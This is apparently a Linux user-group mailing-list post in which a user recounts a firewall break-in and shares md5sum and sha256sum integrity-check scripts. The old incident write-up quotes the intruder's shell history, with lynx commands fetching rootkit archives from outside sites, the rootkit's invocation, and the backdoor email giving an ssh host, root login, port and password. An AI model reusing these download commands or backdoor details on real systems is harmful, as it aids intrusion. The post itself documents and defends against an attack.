BLU group members --

(This is sort of a long note but it may be of interest, & I don't post often...)

I was hacked about a year ago. I wrote up the following shortly after the incident occurred. Given the current discussion I thought it might be worth posting.

I'm still not sure how the initial breach occurred but suspect it was a poor password. I still have the hacker's .bash_history and (somewhere) a disk image of the hacked system.

Since then (besides closing all unused ports, turning off telnet & other insecure services, ...) I made a list of critical files in /etc, /sbin, ... and run md5sum against them regularly looking for changes. This isn't automated, but easily could be.

Just for completeness, here are the commands --

To make the initial list:

===
#!/bin/sh
find /sbin -type f -exec md5sum {} \; > md5list1.txt
find /bin -type f -exec md5sum {} \; >> md5list1.txt
find /etc -type f -exec md5sum {} \; >> md5list1.txt
find /usr/sbin -type f -exec md5sum {} \; >> md5list1.txt
find /usr/bin -type f -exec md5sum {} \; >> md5list1.txt
find /usr/local/bin -type f -exec md5sum {} \; >> md5list1.txt
find /usr/lib -maxdepth 1 -type f -exec md5sum {} \; >> md5list1.txt
=========

Then to test,

md5sum --check md5list1.txt | grep -i failed > diff.txt

I've tried tripwire but found the above much easier to do & understand.

One detection over the past year -- my daughter (who has worked as a linux sysadmin) added her boyfriend as a user. That tripped the passwd and shadow files.

====================== Initial note, written up a year ago but never mailed ===========

My firewall was hacked last week. I took it offline as soon as I suspected -- (Re-configured spare, locked it up, and hopefully secure now - )

I thought the group might be interested in a quick summary.

Bottom line -- the firewall was compromised (burned to a crisp) but the fire seems to have stopped there.

The computer was running RH 5.1, with updated kernel 2.0.34

I'm still not sure what the exploit was. (Wasn't ftpd or imapd. Maybe lpr?)

I think the hacker may have been logged on when I broke the connection -- certainly he left a bunch of clues -- his .bash_history lists several "interesting" sites and packages -- rootkit, etc

Quick summary of sites and packages -- (extracted from his .bash_history)

lynx rollcage.net/x3.tar.gz
lynx rollcage.net/diverse/essh.tgz
lynx rollcage.net/diverse/dick.tgz
lynx rollcage.net/diverse/ftp.tar.gz
lynx rollcage.net/diverse/bec.tgz
lynx www.hanks.host.sk/srk.tgz
lynx www.sinrk.host.sk/srk.tgz

This last is a rootkit which when invoked like so

./srk rexnet 55789 1971

sent an email thus:

======
To: decoder at email.ro (note, Mon May 26 09:22:44 EDT 2003 the ip is no longer valid )
Subject: SRK
ssh 24.128.27.182 -l root -p 55789 # horne.blat.net
password: rexnet
psyBNC: 1971
======

This email didn't make it out of my system, came to me as root on my main computer. I was at work but usually have a window open to home machine. Looked weird; did a couple of quick checks, then called home, had my daughter pull the network cables.

======== (End old writeup)

Steve
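An added example of the same baseline-and-compare idea, written for this archive page and not Steve's script: `md5sum --check` only reports entries that are already in the list, so a binary dropped into /usr/local/bin or a file removed from /etc is never noticed, and MD5 collisions are practical today. This version uses sha256sum and reports NEW and MISSING paths as well as CHANGED ones; the directory names in the usage comment are placeholders, and the baseline is assumed to live off the host, since a rootkit can replace the hash tool as easily as any other binary.

```sh
#!/bin/sh
# Added example, not the poster's script: hash baseline + comparison for the
# directories listed above. `md5sum --check` only reports entries already in
# the list, so this also flags NEW and MISSING files, and uses sha256sum.
# Keep the baseline (and ideally a known-good sha256sum binary) off the host:
# a rootkit can trojan the hash tool as easily as /bin/login.

# Emit "HASH  PATH" for every regular file below the given directories.
# `-exec ... {} +` is POSIX and safe for paths containing spaces.
make_baseline() {
    find "$@" -type f -exec sha256sum {} + | sort -k 2
}

# Compare a fresh snapshot of the directories in $2.. against baseline $1.
# Prints one of "CHANGED path", "NEW path", "MISSING path" per difference.
# Returns 0 when everything matches, 1 when anything differs, 2 on error.
check_baseline() {
    base=$1; shift
    snap=$(mktemp) || return 2
    make_baseline "$@" > "$snap"
    # sha256sum output is fixed-width: 64 hex chars, two spaces, then the path.
    awk '
        FILENAME == ARGV[1] { old[substr($0, 67)] = substr($0, 1, 64); next }
        {
            p = substr($0, 67); h = substr($0, 1, 64); seen[p] = 1
            if (!(p in old))      { print "NEW " p;     bad = 1 }
            else if (old[p] != h) { print "CHANGED " p; bad = 1 }
        }
        END {
            for (p in old) if (!(p in seen)) { print "MISSING " p; bad = 1 }
            exit bad
        }
    ' "$base" "$snap"
    rc=$?
    rm -f "$snap"
    return $rc
}

# Usage as root, baseline kept on removable media (paths are placeholders):
#   make_baseline /sbin /bin /etc /usr/sbin /usr/bin > /mnt/usb/base.txt
#   check_baseline /mnt/usb/base.txt /sbin /bin /etc /usr/sbin /usr/bin
```

In Steve's passwd/shadow case the output would be two CHANGED lines; a new account's home directory or a dropped tool would additionally show up as NEW, which the original grep for "failed" cannot surface.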